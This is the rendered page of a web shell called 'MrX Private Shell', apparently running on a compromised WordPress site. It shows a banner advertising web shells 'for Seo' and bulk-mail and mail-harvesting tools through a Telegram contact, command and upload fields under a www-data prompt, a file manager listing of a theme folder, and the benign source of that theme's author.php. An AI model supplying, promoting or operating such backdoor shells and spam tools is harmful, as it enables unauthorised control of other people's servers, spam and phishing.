__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.111: ~ $
<?php
    get_header();
    get_template_part('navigation');

    echo '<div class="content">',
    // author name
         '<h1 class="page-title">'.get_the_author().'</h1>',
    // avatar
         '<div class="avatar-profile">',
         '<div class="alignleft avatar">'.get_avatar( get_the_author_meta( 'email' ), '150' ).'</div>';
    // description
         if ( get_the_author_meta('description') ) : // If a user wrote a description
        echo '<p class="author-description">'.get_the_author_meta('description' ).'</p>';
         endif;
    // website
        if ( get_the_author_meta('user_url') ) : // If a user set a website 
        echo '<p class="author-url"><strong>';
        _e('Website', 'wikiwp');
        echo ':</strong> <a href="'.get_the_author_meta('user_url').'" title="'.get_the_author_meta('user_url').'" target="_blank">'.get_the_author_meta('user_url').'</a></p>';
        endif;
    // author's posts
    echo '<div class="author-postings">',
         '<h3>'.get_the_author();
         _e('&acute;s postings', 'wikiwp');
    echo '</h3>',
         '<ul>'; 
    if ( have_posts() ) : while ( have_posts() ) : the_post();
    echo '<li>',
         '<a href="'.get_permalink().'" rel="bookmark" title="'.get_the_title().'">'.get_the_title().'</a>',
         '</li>';
         endwhile;
    echo '</ul>';
         // no posts by this autor so far 
         else:
    echo '<p>';
    _e('No posts by this author.', 'wikiwp');
    echo '</p>';
    endif;
    echo '</div>', // end of .author-postings
         '</div>';// end of .avatar-profile
    // author list
    echo '<div class="author-list">',
         '<h2>';
    _e('Our authors', 'wikiwp');
    echo '</h2>',
         '<ul>';
         wp_list_authors('show_fullname=1&optioncount=1&orderby=post_count&order=DESC');
    echo '</ul>';
    echo '</div>',
         '</div>'; // end of .content
    // footer
    get_footer();

Filemanager

Name Type Size Permission Actions
css Folder 0755
en Folder 0755
images Folder 0755
js Folder 0755
languages Folder 0755
404.php File 565 B 0644
author.php File 1.86 KB 0644
category.php File 1.44 KB 0644
changelog.md File 13.25 KB 0644
comments.php File 927 B 0644
content.php File 524 B 0644
footer.php File 1.38 KB 0644
functions.php File 27.15 KB 0644
header.php File 2.72 KB 0644
index.php File 1.93 KB 0644
license.md File 1.72 KB 0644
navigation.php File 1.74 KB 0644
page.php File 280 B 0644
postinfo.php File 2.82 KB 0644
readme.md File 816 B 0644
screenshot.png File 146 KB 0644
search.php File 1.48 KB 0644
searchform.php File 401 B 0644
sidebar.php File 3.17 KB 0644
single.php File 506 B 0644
style.css File 24.24 KB 0644
wiki-page.php File 389 B 0644
Filemanager